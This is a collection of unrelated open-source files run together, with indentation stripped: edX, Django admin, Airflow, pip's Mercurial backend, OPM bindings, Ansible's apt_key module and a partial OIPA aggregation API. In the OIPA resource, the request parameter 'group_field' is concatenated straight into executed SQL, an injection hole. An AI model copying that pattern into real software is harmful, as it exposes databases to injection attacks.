verified_mode = CourseMode.objects.get(course_id=course_key, mode_slug=CourseMode.VERIFIED)
if _should_update_date(verified_mode):
course = modulestore().get_course(course_key)
if not course:
return None
verification_window = CourseModeExpirationConfig.current().verification_window
new_expiration_datetime = course.end - verification_window
if verified_mode.expiration_datetime != new_expiration_datetime:
# Set the expiration_datetime without triggering the explicit flag
verified_mode._expiration_datetime = new_expiration_datetime # pylint: disable=protected-access
verified_mode.save()
except ObjectDoesNotExist:
pass
def _should_update_date(verified_mode):
""" Returns whether or not the verified mode should be updated. """
return not(verified_mode is None or verified_mode.expiration_datetime_is_explicit)
| agpl-3.0 |
vquinones/admindemo | myadmin/views.py | 2 | 1463 | from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.views.generic.base import TemplateView
#from django.contrib.admin.views.decorators import staff_member_required
from django.conf.urls import patterns
from django.contrib import admin
class ScreenConfigurationView(TemplateView):
template_name = 'admin/content/screen.configuration.html'
def get_context_data(self, *args, **kwargs):
context = super(ScreenConfigurationView, self).get_context_data(**kwargs)
return context
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ScreenConfigurationView, self).dispatch(*args, **kwargs)
class DisplayConfigurationView(TemplateView):
template_name = 'admin/content/display.configuration.html'
def get_context_data(self, *args, **kwargs):
context = super(DisplayConfigurationView, self).get_context_data(**kwargs)
return context
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(DisplayConfigurationView, self).dispatch(*args, **kwargs)
def get_admin_urls(urls):
def get_urls():
my_urls = patterns('',
(r'^my_view/$', admin.site.admin_view(ScreenConfigurationView.as_view()))
)
return my_urls + urls
return get_urls
admin_urls = get_admin_urls(admin.site.get_urls())
admin.site.get_urls = admin_urls | gpl-2.0 |
mtdewulf/incubator-airflow | airflow/contrib/operators/dataflow_operator.py | 14 | 3784 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from airflow.contrib.hooks.gcp_dataflow_hook import DataFlowHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataFlowJavaOperator(BaseOperator):
"""
Start a Java Cloud DataFlow batch job. The parameters of the operation
will be passed to the job.
It's a good practice to define dataflow_* parameters in the default_args of the dag
like the project, zone and staging location.
```
default_args = {
'dataflow_default_options': {
'project': 'my-gcp-project',
'zone': 'europe-west1-d',
'stagingLocation': 'gs://my-staging-bucket/staging/'
}
}
```
You need to pass the path to your dataflow as a file reference with the ``jar``
parameter, the jar needs to be a self executing jar. Use ``options`` to pass on
options to your job.
```
t1 = DataFlowOperation(
task_id='datapflow_example',
jar='{{var.value.gcp_dataflow_base}}pipeline/build/libs/pipeline-example-1.0.jar',
options={
'autoscalingAlgorithm': 'BASIC',
'maxNumWorkers': '50',
'start': '{{ds}}',
'partitionType': 'DAY'
},
dag=my-dag)
```
Both ``jar`` and ``options`` are templated so you can use variables in them.
"""
template_fields = ['options', 'jar']
ui_color = '#0273d4'
@apply_defaults
def __init__(
self,
jar,
dataflow_default_options=None,
options=None,
gcp_conn_id='google_cloud_default',
delegate_to=None,
*args,
**kwargs):
"""
Create a new DataFlowJavaOperator.
For more detail on about job submission have a look at the reference:
https://cloud.google.com/dataflow/pipelines/specifying-exec-params
:param jar: The reference to a self executing DataFlow jar.
:type jar: string
:param dataflow_default_options: Map of default job options.
:type dataflow_default_options: dict
:param options: Map of job specific options.
:type options: dict
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:type gcp_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
"""
super(DataFlowJavaOperator, self).__init__(*args, **kwargs)
dataflow_default_options = dataflow_default_options or {}
options = options or {}
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.jar = jar
self.dataflow_default_options = dataflow_default_options
self.options = options
def execute(self, context):
hook = DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to)
dataflow_options = copy.copy(self.dataflow_default_options)
dataflow_options.update(self.options)
hook.start_java_dataflow(self.task_id, dataflow_options, self.jar)
| apache-2.0 |
cjaffar/jaffarchiosa | jaffarchiosa/lib/python2.7/site-packages/pip/vcs/mercurial.py | 392 | 5820 | import os
import tempfile
import re
import sys
from pip.util import call_subprocess
from pip.util import display_path, rmtree
from pip.log import logger
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
from pip.backwardcompat import ConfigParser
class Mercurial(VersionControl):
name = 'hg'
dirname = '.hg'
repo_name = 'clone'
schemes = ('hg', 'hg+http', 'hg+https', 'hg+ssh', 'hg+static-http')
bundle_file = 'hg-clone.txt'
guide = ('# This was a Mercurial repo; to make it a repo again run:\n'
'hg init\nhg pull %(url)s\nhg update -r %(rev)s\n')
def parse_vcs_bundle_file(self, content):
url = rev = None
for line in content.splitlines():
if not line.strip() or line.strip().startswith('#'):
continue
url_match = re.search(r'hg\s*pull\s*(.*)\s*', line)
if url_match:
url = url_match.group(1).strip()
rev_match = re.search(r'^hg\s*update\s*-r\s*(.*)\s*', line)
if rev_match:
rev = rev_match.group(1).strip()
if url and rev:
return url, rev
return None, None
def export(self, location):
"""Export the Hg repository at the url to the destination location"""
temp_dir = tempfile.mkdtemp('-export', 'pip-')
self.unpack(temp_dir)
try:
call_subprocess(
[self.cmd, 'archive', location],
filter_stdout=self._filter, show_stdout=False, cwd=temp_dir)
finally:
rmtree(temp_dir)
def switch(self, dest, url, rev_options):
repo_config = os.path.join(dest, self.dirname, 'hgrc')
config = ConfigParser.SafeConfigParser()
try:
config.read(repo_config)
config.set('paths', 'default', url)
config_file = open(repo_config, 'w')
config.write(config_file)
config_file.close()
except (OSError, ConfigParser.NoSectionError):
e = sys.exc_info()[1]
logger.warn(
'Could not switch Mercurial repository to %s: %s'
% (url, e))
else:
call_subprocess([self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def update(self, dest, rev_options):
call_subprocess([self.cmd, 'pull', '-q'], cwd=dest)
call_subprocess(
[self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def obtain(self, dest):
url, rev = self.get_url_rev()
if rev:
rev_options = [rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
if self.check_destination(dest, url, rev_options, rev_display):
logger.notify('Cloning hg %s%s to %s'
% (url, rev_display, display_path(dest)))
call_subprocess([self.cmd, 'clone', '--noupdate', '-q', url, dest])
call_subprocess([self.cmd, 'update', '-q'] + rev_options, cwd=dest)
def get_url(self, location):
url = call_subprocess(
[self.cmd, 'showconfig', 'paths.default'],
show_stdout=False, cwd=location).strip()
if self._is_local_repository(url):
url = path_to_url(url)
return url.strip()
def get_tag_revs(self, location):
tags = call_subprocess(
[self.cmd, 'tags'], show_stdout=False, cwd=location)
tag_revs = []
for line in tags.splitlines():
tags_match = re.search(r'([\w\d\.-]+)\s*([\d]+):.*$', line)
if tags_match:
tag = tags_match.group(1)
rev = tags_match.group(2)
if "tip" != tag:
tag_revs.append((rev.strip(), tag.strip()))
return dict(tag_revs)
def get_branch_revs(self, location):
branches = call_subprocess(
[self.cmd, 'branches'], show_stdout=False, cwd=location)
branch_revs = []
for line in branches.splitlines():
branches_match = re.search(r'([\w\d\.-]+)\s*([\d]+):.*$', line)
if branches_match:
branch = branches_match.group(1)
rev = branches_match.group(2)
if "default" != branch:
branch_revs.append((rev.strip(), branch.strip()))
return dict(branch_revs)
def get_revision(self, location):
current_revision = call_subprocess(
[self.cmd, 'parents', '--template={rev}'],
show_stdout=False, cwd=location).strip()
return current_revision
def get_revision_hash(self, location):
current_rev_hash = call_subprocess(
[self.cmd, 'parents', '--template={node}'],
show_stdout=False, cwd=location).strip()
return current_rev_hash
def get_src_requirement(self, dist, location, find_tags):
repo = self.get_url(location)
if not repo.lower().startswith('hg:'):
repo = 'hg+' + repo
egg_project_name = dist.egg_name().split('-', 1)[0]
if not repo:
return None
current_rev = self.get_revision(location)
current_rev_hash = self.get_revision_hash(location)
tag_revs = self.get_tag_revs(location)
branch_revs = self.get_branch_revs(location)
if current_rev in tag_revs:
# It's a tag
full_egg_name = '%s-%s' % (egg_project_name, tag_revs[current_rev])
elif current_rev in branch_revs:
# It's the tip of a branch
full_egg_name = '%s-%s' % (egg_project_name, branch_revs[current_rev])
else:
full_egg_name = '%s-dev' % egg_project_name
return '%s@%s#egg=%s' % (repo, current_rev_hash, full_egg_name)
vcs.register(Mercurial)
| mit |
totto82/opm-common | python/opm/io/ecl/__init__.py | 7 | 7470 | from opm._common import eclArrType
from opm._common import EclFile
from opm._common import ERst
from opm._common import ESmry
from opm._common import EGrid
from opm._common import ERft
from opm._common import EclOutput
import sys
import datetime
import numpy as np
import datetime
# When extracting the strings from CHAR keywords we get a character array, in
# Python this becomes a list of bytes. This desperate monkey-patching is to
# ensure the EclFile class returns normal Python strings in the case of CHAR
# arrays. The return value is normal Python list of strings.
@property
def eclfile_get_list_of_arrays(self):
if sys.version_info.major == 2:
rawData = self.__get_list_of_arrays()
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in rawData ]
else:
return self.__get_list_of_arrays()
def getitem_eclfile(self, arg):
if isinstance(arg, tuple):
data, array_type = self.__get_data(str(arg[0]), int(arg[1]))
else:
data, array_type = self.__get_data(arg)
if array_type == eclArrType.CHAR or array_type == eclArrType.C0nn:
return [ x.decode("utf-8") for x in data ]
return data
def erst_get_list_of_arrays(self, arg):
if sys.version_info.major==2:
rawData = self.__get_list_of_arrays(arg)
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in rawData ]
else:
return self.__get_list_of_arrays(arg)
def getitem_erst(self, arg):
if not isinstance(arg, tuple):
raise ValueError("expecting tuple argument, (index, rstep), (name, rstep) or (name, rstep, occurrence) ")
if len(arg) == 2:
if isinstance(arg[0], int):
data, array_type = self.__get_data(arg[0], int(arg[1]))
else:
data, array_type = self.__get_data(str(arg[0]), int(arg[1]), 0) # default first occurrence
elif len(arg) == 3:
data, array_type = self.__get_data(str(arg[0]), int(arg[1]), int(arg[2]))
else:
raise ValueError("expecting tuple argument with 2 or 3 argumens: (index, rstep), (name, rstep) or (name, rstep, occurrence) ")
if array_type == eclArrType.CHAR or array_type == eclArrType.C0nn:
return [ x.decode("utf-8") for x in data ]
return data
def contains_erst(self, arg):
if isinstance(arg, tuple):
if len(arg) == 2:
return self.__contains((arg[0], arg[1]))
else:
raise ValueError("expecting tuple (array name , report step number) or \
or report step number")
elif isinstance(arg, int):
return self.__has_report_step(arg)
else:
raise ValueError("expecting tuple (array name , report step number) or \
or report step number")
@property
def esmry_end_date(self):
start = self.start_date
time = self.__get_all("TIME")
return start + datetime.timedelta(days = float(time[-1]))
def getitem_esmry(self, arg):
if isinstance(arg, tuple):
if arg[1] == True:
return self.__get_at_rstep(arg[0])
else:
return self.__get_all(arg[0])
else:
return self.__get_all(arg)
def contains_erft(self, arg):
if isinstance(arg, tuple):
if len(arg) == 4:
return self.__has_rft(arg[0], arg[1], arg[2], arg[3])
elif len(arg) == 5:
return self.__has_array(arg[0], arg[1], (arg[2], arg[3], arg[4]))
elif len(arg) == 2:
return self.__has_array(arg[0], arg[1])
else:
raise ValueError("expecting tuple (wellname, year, month, day) or \
(arrayName, wellname, year, month, day) or (arrayName, report_index)")
else:
raise ValueError("expecting tuple (wellname, year, month, day) or \
(arrayName, wellname, year, month, day) or (arrayName, report_index)")
@property
def erft_list_of_rfts(self):
if sys.version_info.major==2:
data = self.__get_list_of_rfts()
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in data ]
else:
return self.__get_list_of_rfts()
def erft_list_of_arrays(self, arg1, arg2 = None):
if not arg2:
data = self.__get_list_of_arrays(int(arg1))
else:
data = self.__get_list_of_arrays(str(arg1), int(arg2[0]), int(arg2[1]), int(arg2[2]))
if sys.version_info.major==2:
return [ ( x[0].encode("utf-8"), x[1], x[2] ) for x in data ]
else:
return data
def getitem_erft(self, arg):
if isinstance(arg, tuple):
if len(arg) == 2:
data, array_type = self.__get_data(arg[0], arg[1])
elif len(arg) == 5:
data, array_type = self.__get_data(arg[0], arg[1], arg[2], arg[3], arg[4])
else:
raise ValueError("ERft.__getitem__, expecting tuple (name, index) or (name, well, y, m, d)")
else:
raise ValueError("ERft.__getitem__, expecting tuple (name, index) or (name, well, y, m, d)")
if array_type == eclArrType.CHAR:
return np.array([ x.decode("utf-8") for x in data ])
else:
return data
'''
EclOutput supports writing of numpy arrays. Data types
(CHAR, LOGI, REAL, DOUB and INTE) is derived from the numpy dtype property
EclOutput partly supports writing of python lists
(CHAR, LOGI, INTE)
'''
def ecloutput_write(self, name, array, C0nn=False):
if isinstance(array, list):
if all(isinstance(element, str) for element in array):
array = np.array(array)
elif all(isinstance(element, bool) for element in array):
array = np.array(array)
elif all(isinstance(element, int) for element in array):
array = np.array(array, dtype = "int32")
elif sys.version_info.major == 2 and all(isinstance(element, unicode) for element in array):
array = np.array(array)
else:
raise ValueError("!!array {} is python list, type {}, not supported".format(name, type(array[0])))
if not isinstance(array, np.ndarray):
raise ValueError("EclOutput - write function works only for numpy arrays")
if array.dtype == "float32":
self.__write_real_array(name, array)
elif array.dtype == "int32":
self.__write_inte_array(name, array)
elif array.dtype == "int64":
print ("!Warning, writing numpy dtype=int64 to 32 bit integer format")
self.__write_inte_array(name, array)
elif array.dtype == "float64":
self.__write_doub_array(name, array)
elif array.dtype == "bool":
self.__write_logi_array(name, array)
elif array.dtype.kind in {'U', 'S'} and not C0nn:
self.__write_char_array(name, array)
elif array.dtype.kind in {'U', 'S'} and C0nn:
maxStrLength = max([len(x) for x in array])
self.__write_c0nn_array(name, array, max([maxStrLength, 8]))
else:
raise ValueError("unknown array type for array {}".format(name))
setattr(EclFile, "__getitem__", getitem_eclfile)
setattr(EclFile, "arrays", eclfile_get_list_of_arrays)
setattr(ERst, "__contains__", contains_erst)
setattr(ERst, "arrays", erst_get_list_of_arrays)
setattr(ERst, "__getitem__", getitem_erst)
setattr(ESmry, "end_date", esmry_end_date)
setattr(ESmry, "__getitem__", getitem_esmry)
setattr(ERft, "__contains__", contains_erft)
setattr(ERft, "list_of_rfts", erft_list_of_rfts)
setattr(ERft, "arrays", erft_list_of_arrays)
setattr(ERft, "__getitem__",getitem_erft)
setattr(EclOutput, "write", ecloutput_write)
| gpl-3.0 |
stansonhealth/ansible-modules-core | packaging/os/apt_key.py | 14 | 10248 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2012, Jayson Vantuyl <jayson@aggressive.ly>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: apt_key
author: "Jayson Vantuyl & others (@jvantuyl)"
version_added: "1.0"
short_description: Add or remove an apt key
description:
- Add or remove an I(apt) key, optionally downloading it
notes:
- doesn't download the key unless it really needs it
- as a sanity check, downloaded key id must match the one specified
- best practice is to specify the key id and the url
options:
id:
required: false
default: none
description:
- identifier of key. Including this allows check mode to correctly report the changed state.
data:
required: false
default: none
description:
- keyfile contents
file:
required: false
default: none
description:
- keyfile path
keyring:
required: false
default: none
description:
- path to specific keyring file in /etc/apt/trusted.gpg.d
version_added: "1.3"
url:
required: false
default: none
description:
- url to retrieve key from.
keyserver:
version_added: "1.6"
required: false
default: none
description:
- keyserver to retrieve key from.
state:
required: false
choices: [ absent, present ]
default: present
description:
- used to specify if key is being added or revoked
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
'''
EXAMPLES = '''
# Add an apt key by id from a keyserver
- apt_key: keyserver=keyserver.ubuntu.com id=36A1D7869245C8950F966E92D8576A8BA88D21E9
# Add an Apt signing key, uses whichever key is at the URL
- apt_key: url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=present
# Add an Apt signing key, will not download if present
- apt_key: id=473041FA url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=present
# Remove an Apt signing key, uses whichever key is at the URL
- apt_key: url=https://ftp-master.debian.org/keys/archive-key-6.0.asc state=absent
# Remove a Apt specific signing key, leading 0x is valid
- apt_key: id=0x473041FA state=absent
# Add a key from a file on the Ansible server
- apt_key: data="{{ lookup('file', 'apt.gpg') }}" state=present
# Add an Apt signing key to a specific keyring file
- apt_key: id=473041FA url=https://ftp-master.debian.org/keys/archive-key-6.0.asc keyring=/etc/apt/trusted.gpg.d/debian.gpg state=present
'''
# FIXME: standardize into module_common
from traceback import format_exc
from re import compile as re_compile
# FIXME: standardize into module_common
from distutils.spawn import find_executable
from os import environ
from sys import exc_info
import traceback
match_key = re_compile("^gpg:.*key ([0-9a-fA-F]+):.*$")
REQUIRED_EXECUTABLES=['gpg', 'grep', 'apt-key']
def check_missing_binaries(module):
missing = [e for e in REQUIRED_EXECUTABLES if not find_executable(e)]
if len(missing):
module.fail_json(msg="binaries are missing", names=missing)
def all_keys(module, keyring, short_format):
if keyring:
cmd = "apt-key --keyring %s adv --list-public-keys --keyid-format=long" % keyring
else:
cmd = "apt-key adv --list-public-keys --keyid-format=long"
(rc, out, err) = module.run_command(cmd)
results = []
lines = to_native(out).split('\n')
for line in lines:
if line.startswith("pub") or line.startswith("sub"):
tokens = line.split()
code = tokens[1]
(len_type, real_code) = code.split("/")
results.append(real_code)
if short_format:
results = shorten_key_ids(results)
return results
def shorten_key_ids(key_id_list):
"""
Takes a list of key ids, and converts them to the 'short' format,
by reducing them to their last 8 characters.
"""
short = []
for key in key_id_list:
short.append(key[-8:])
return short
def download_key(module, url):
# FIXME: move get_url code to common, allow for in-memory D/L, support proxies
# and reuse here
if url is None:
module.fail_json(msg="needed a URL but was not specified")
try:
rsp, info = fetch_url(module, url)
if info['status'] != 200:
module.fail_json(msg="Failed to download key at %s: %s" % (url, info['msg']))
return rsp.read()
except Exception:
module.fail_json(msg="error getting key id from url: %s" % url, traceback=format_exc())
def import_key(module, keyring, keyserver, key_id):
if keyring:
cmd = "apt-key --keyring %s adv --keyserver %s --recv %s" % (keyring, keyserver, key_id)
else:
cmd = "apt-key adv --keyserver %s --recv %s" % (keyserver, key_id)
for retry in range(5):
(rc, out, err) = module.run_command(cmd)
if rc == 0:
break
else:
# Out of retries
module.fail_json(cmd=cmd, msg="error fetching key from keyserver: %s" % keyserver,
rc=rc, stdout=out, stderr=err)
return True
def add_key(module, keyfile, keyring, data=None):
if data is not None:
if keyring:
cmd = "apt-key --keyring %s add -" % keyring
else:
cmd = "apt-key add -"
(rc, out, err) = module.run_command(cmd, data=data, check_rc=True, binary_data=True)
else:
if keyring:
cmd = "apt-key --keyring %s add %s" % (keyring, keyfile)
else:
cmd = "apt-key add %s" % (keyfile)
(rc, out, err) = module.run_command(cmd, check_rc=True)
return True
def remove_key(module, key_id, keyring):
# FIXME: use module.run_command, fail at point of error and don't discard useful stdin/stdout
if keyring:
cmd = 'apt-key --keyring %s del %s' % (keyring, key_id)
else:
cmd = 'apt-key del %s' % key_id
(rc, out, err) = module.run_command(cmd, check_rc=True)
return True
def main():
module = AnsibleModule(
argument_spec=dict(
id=dict(required=False, default=None),
url=dict(required=False),
data=dict(required=False),
file=dict(required=False),
key=dict(required=False),
keyring=dict(required=False),
validate_certs=dict(default='yes', type='bool'),
keyserver=dict(required=False),
state=dict(required=False, choices=['present', 'absent'], default='present')
),
supports_check_mode=True
)
key_id = module.params['id']
url = module.params['url']
data = module.params['data']
filename = module.params['file']
keyring = module.params['keyring']
state = module.params['state']
keyserver = module.params['keyserver']
changed = False
# we use the "short" id: key_id[-8:], short_format=True
# it's a workaround for https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1481871
if key_id:
try:
_ = int(key_id, 16)
if key_id.startswith('0x'):
key_id = key_id[2:]
key_id = key_id.upper()[-8:]
except ValueError:
module.fail_json(msg="Invalid key_id", id=key_id)
# FIXME: I think we have a common facility for this, if not, want
check_missing_binaries(module)
short_format = True
keys = all_keys(module, keyring, short_format)
return_values = {}
if state == 'present':
if key_id and key_id in keys:
module.exit_json(changed=False)
else:
if not filename and not data and not keyserver:
data = download_key(module, url)
if key_id and key_id in keys:
module.exit_json(changed=False)
else:
if module.check_mode:
module.exit_json(changed=True)
if filename:
add_key(module, filename, keyring)
elif keyserver:
import_key(module, keyring, keyserver, key_id)
else:
add_key(module, "-", keyring, data)
changed=False
keys2 = all_keys(module, keyring, short_format)
if len(keys) != len(keys2):
changed=True
if key_id and not key_id in keys2:
module.fail_json(msg="key does not seem to have been added", id=key_id)
module.exit_json(changed=changed)
elif state == 'absent':
if not key_id:
module.fail_json(msg="key is required")
if key_id in keys:
if module.check_mode:
module.exit_json(changed=True)
if remove_key(module, key_id, keyring):
changed=True
else:
# FIXME: module.fail_json or exit-json immediately at point of failure
module.fail_json(msg="error removing key_id", **return_values)
module.exit_json(changed=changed, **return_values)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
main()
| gpl-3.0 |
bryanph/OIPA | OIPA/api/v3/resources/aggregation_resources.py | 1 | 18208 | # Tastypie specific
from tastypie.resources import ModelResource
# cache specific
from api.cache import NoTransformCache
from iati.models import AidType
from iati.models import Activity
from cache.validator import Validator
# Direct sql specific
import ujson
from django.db import connection
from django.http import HttpResponse
# Helpers
from api.v3.resources.custom_call_helper import CustomCallHelper
class ActivityAggregatedAnyResource(ModelResource):
class Meta:
queryset = Activity.objects.none()
resource_name = 'activity-aggregate-any'
include_resource_uri = True
cache = NoTransformCache()
allowed_methods = ['get']
def get_list(self, request, **kwargs):
# get group by and aggregation pars
group_by_key = request.GET.get('group_by', None)
aggregation_key = request.GET.get('aggregation_key', 'iati-identifier')
group_field = request.GET.get('group_field', 'start_actual')
query = request.GET.get('query', '')
if group_by_key in {'commitment', 'disbursement', 'incoming-fund'}:
group_field = 't.value_date'
aggregation_element_dict = {
'iati-identifier': {
'select': 'a.id',
'type': 'count',
'from_addition': ''},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'type': 'count',
'from_addition': ''},
'title': {
'select': 't.title',
'type': 'count',
'from_addition': 'JOIN iati_title as t on a.id = t.activity_id '},
'description': {
'select': 'd.description',
'type': 'count',
'from_addition': 'JOIN iati_description as d on a.id = d.activity_id '},
'commitment': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "C" '},
'disbursement': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "D" '},
'expenditure': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "E" '},
'incoming-fund': {
'select': 't.value',
'type': 'sum',
'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ',
'where_addition': 'AND t.transaction_type_id = "IF" '},
'location': {
'select': 'l.activity_id',
'type': 'count',
'from_addition': 'JOIN iati_location as l on a.id = l.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'type': 'count',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
'total-budget': {
'select': 'a.total_budget',
'type': 'sum',
'from_addition': ''},
}
group_by_element_dict = {
'recipient-country': {
'select': 'rc.country_id',
'from_addition': 'JOIN iati_activityrecipientcountry as rc on a.id = rc.activity_id '},
'recipient-region': {
'select': 'r.name, rr.region_id',
'from_addition': 'JOIN iati_activityrecipientregion as rr on a.id = rr.activity_id '
'join geodata_region as r on rr.region_id = r.code '},
'year': {
'select': 'YEAR('+group_field+')',
'from_addition': ''},
'sector': {
'select': 'acts.sector_id',
'from_addition': 'JOIN iati_activitysector as acts on a.id = acts.activity_id '},
'reporting-org': {
'select': 'a.reporting_organisation_id',
'from_addition': ''},
'participating-org': {
'select': 'po.name',
'from_addition': 'JOIN iati_activityparticipatingorganisation as po on a.id = po.activity_id '},
'policy-marker': {
'select': 'pm.policy_marker_id',
'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
'r.title': {
'select': 'r.title',
'from_addition': 'JOIN iati_result as r on a.id = r.activity_id ',
'where_addition': ' AND r.title = %(query)s '},
}
helper = CustomCallHelper()
cursor = connection.cursor()
# get filters
reporting_organisations = helper.get_and_query(
request,
'reporting_organisation__in',
'a.reporting_organisation_id')
recipient_countries = helper.get_and_query(request, 'countries__in', 'rc.country_id')
recipient_regions = helper.get_and_query(request, 'regions__in', 'rr.region_id')
total_budgets = helper.get_and_query(request, 'total_budget__in', 'a.total_budget')
sectors = helper.get_and_query(request, 'sectors__in', 'acts.sector_id')
if aggregation_key in aggregation_element_dict:
aggregation_info = aggregation_element_dict[aggregation_key]
aggregation_key = aggregation_info["select"]
aggregation_type = aggregation_info["type"]
aggregation_from_addition = aggregation_info["from_addition"]
aggregation_where_addition = ""
if "where_addition" in aggregation_info:
aggregation_where_addition = aggregation_info["where_addition"]
else:
return HttpResponse(ujson.dumps({
"error": "Invalid aggregation key, see included list for viable keys.",
"valid_aggregation_keys": list(aggregation_element_dict.keys())}),
content_type='application/json')
if group_by_key in group_by_element_dict:
group_by_info = group_by_element_dict[group_by_key]
group_select = group_by_info["select"]
group_from_addition = group_by_info["from_addition"]
if "where_addition" in group_by_info and query:
aggregation_where_addition = aggregation_where_addition.join(group_by_info["where_addition"])
else:
return HttpResponse(ujson.dumps({
"error": "Invalid group by key, see included list for viable keys.",
"valid_group_by_keys": list(group_by_element_dict.keys())}),
content_type='application/json')
# make sure group key and aggregation key are set
if not group_by_key:
return HttpResponse(ujson.dumps(
"No field to group by. add parameter group_by (country/region/etc.. see docs)"),
content_type='application/json')
if not aggregation_key:
return HttpResponse(ujson.dumps(
"No field to aggregate on. add parameter aggregation_key "),
content_type='application/json')
query_select = ''.join([
'SELECT ',
aggregation_type,
'(',
aggregation_key,
') as aggregation_field, ',
group_select,
' as group_field '])
query_from = ''.join([
'FROM iati_activity as a ',
aggregation_from_addition,
group_from_addition])
query_where = ''.join([
'WHERE 1 ',
aggregation_where_addition])
query_group_by = ''.join([
'GROUP BY ',
group_select])
# fill where part
filter_string = ''.join([
'AND (',
reporting_organisations,
recipient_countries,
recipient_regions,
total_budgets,
sectors,
')'])
if filter_string == 'AND ()':
filter_string = ""
elif 'AND ()' in filter_string:
filter_string = filter_string[:-6]
query_where += filter_string
if not filter_string and query_from == 'FROM iati_activity as a ':
if group_by_key == "country":
query_select = 'SELECT count(activity_id) as aggregation_field, country_id as group_field '
query_from = "FROM iati_activityrecipientcountry "
query_group_by = "GROUP BY country_id"
elif group_by_key == "region":
query_select = 'SELECT count(activity_id) as aggregation_field, region_id as group_field '
query_from = "FROM iati_activityrecipientregion "
query_group_by = "GROUP BY region_id"
elif group_by_key == "sector":
query_select = 'SELECT count(activity_id) as aggregation_field, sector_id as group_field '
query_from = "FROM iati_activitysector "
query_group_by = "GROUP BY sector_id"
cursor.execute(query_select + query_from + query_where + query_group_by, {"query": query, })
results1 = helper.get_fields(cursor=cursor)
options = []
for r in results1:
options.append(r)
return HttpResponse(ujson.dumps(options), content_type='application/json')
class ActivityAggregatedAnyNamesResource(ModelResource):
class Meta:
#aid_type is used as dummy
queryset = AidType.objects.all()
resource_name = 'activity-aggregate-any-names'
include_resource_uri = True
cache = NoTransformCache()
allowed_methods = ['get']
def get_list(self, request, **kwargs):
# get group by and aggregation pars
group_by_key = request.GET.get("group_by", None) # valid : country, region, year, sector, reporting org
aggregation_key = request.GET.get("aggregation_key", "iati-identifier")
group_field = request.GET.get("group_field", "start_actual") # used for year filtering, valid : start_planned, start_actual, end_planned, end_actual, defaults to start_actual
if group_by_key in {'commitment', 'disbursement', 'incoming-fund'}:
group_field = "t.value_date"
aggregation_element_dict = {
'iati-identifier': {'select': 'a.id', 'type': 'count', 'from_addition': ''},
'reporting-org': {'select': 'a.reporting_organisation_id', 'type': 'count', 'from_addition': ''},
'title': {'select': 't.title', 'type': 'count', 'from_addition': 'JOIN iati_title as t on a.id = t.activity_id '},
'description': {'select': 'd.description', 'type': 'count', 'from_addition':'JOIN iati_description as d on a.id = d.activity_id '},
'commitment': {'select': 't.value', 'type': 'sum', 'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ', 'where_addition': 'AND t.transaction_type_id = "C" '},
'disbursement': {'select': 't.value', 'type': 'sum', 'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ', 'where_addition': 'AND t.transaction_type_id = "D" '},
'incoming-fund': {'select': 't.value', 'type': 'sum', 'from_addition': 'JOIN iati_transaction as t on a.id = t.activity_id ', 'where_addition': 'AND t.transaction_type_id = "IF" '},
'location': {'select': 'l.activity_id', 'type': 'count', 'from_addition': 'JOIN iati_location as l on a.id = l.activity_id '},
'policy-marker': {'select': 'pm.policy_marker_id', 'type': 'count', 'from_addition': 'JOIN iati_activitypolicymarker as pm on a.id = pm.activity_id '},
